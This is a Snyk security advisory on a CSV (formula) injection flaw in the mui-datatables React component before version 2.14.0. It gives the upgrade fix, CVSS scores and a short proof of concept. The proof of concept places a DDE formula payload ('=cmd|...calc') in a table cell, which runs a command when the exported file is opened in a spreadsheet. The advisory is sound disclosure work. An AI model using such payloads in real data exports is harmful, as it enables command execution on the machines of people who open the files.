| Snyk

Introduced: 29 Mar 2019

How to fix?

Upgrade mui-datatables to version 2.14.0 or higher.

Overview

mui-datatables is a data tables component built on Material-UI.

Affected versions of this package are vulnerable to CSV Injection. CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:

Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software.
Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website
Exfiltrating contents from the spreadsheet, or other open spreadsheets.

Proof Of Concept (PoC)

import React from "react";
import ReactDOM from "react-dom";
import MUIDataTable from "mui-datatables";

class App extends React.Component {
  render() {
    const columns = ["Name", "Title", "Location", "Age", "Salary"];

    const data = [
      ["=cmd|' /C calc'!A0", "Business Analyst", "Minneapolis", 30, "$100,000"],
      ["Aiden Lloyd", "Business Consultant", "Dallas", 55, "$200,000"],
      ["Jaden Collins", "Attorney", "Santa Ana", 27, "$500,000"]
    ];
    const options = {
      filterType: "dropdown",
      responsive: "scroll"
    };
    return (
      <MUIDataTable
        title={"ACME Employee list"}
        data={data}
        columns={columns}
        options={options}
      />
    );
  }
}
ReactDOM.render(<App />, document.getElementById("root"));

References

CVSS Scores

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Privileges Required (PR)
None
User Interaction (UI)
Required

Scope (S)
Unchanged

Confidentiality (C)
Low
Integrity (I)
Low
Availability (A)
Low

CSV Injection Affecting mui-datatables package, versions <2.14.0

Severity

Do your applications use this vulnerable package?